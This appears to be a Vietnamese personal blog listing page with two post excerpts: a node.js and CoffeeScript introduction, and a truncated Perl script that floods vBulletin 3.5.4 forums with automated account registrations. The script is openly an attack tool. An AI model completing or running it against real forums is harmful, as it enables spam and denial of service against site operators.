Portfolio
perl

Giới thiệu node.js và CoffeeScript

October 17, 2011Category : Code/Web

node.js đang là công nghệ rất hot hiện nay. Từ lúc ra đời (2009) đến lúc hot node.js chỉ mất khoảng vài tháng. Điều này có lẽ chỉ có thể giải thích bằng lí do là viết cả client side và lẫn server side của cùng một trang web chỉ bằng một ngôn ngữ là ước..

Read more
03.

flood register(VBB 3.5.4) (perl)

June 10, 2008Category : Bug & Security

#!/usr/bin/perl use IO::Socket; use Getopt::Std; getopts(“h:d:n:u:”); $host = $opt_h; $dir = $opt_d; $n = $opt_n; $u = $opt_u; print “[~] SERVER : $host\r\n”; print “[~] PATH : $dir\r\n”; print “[~] TIMES : $n”; print “\r\n”; print “[~] Attacking… \n”; for($i=1;$i<=$n;$i++) { $h = $i++; $user = $u.$h; $mail = “$user%40stylenet$i.club”; $mail2= $mail; $post1 = “s=&do=register&url=$host$dir&nth=0&day=0&year=0&w..

Read more
04.
© Oliver / All rights reserved.
To top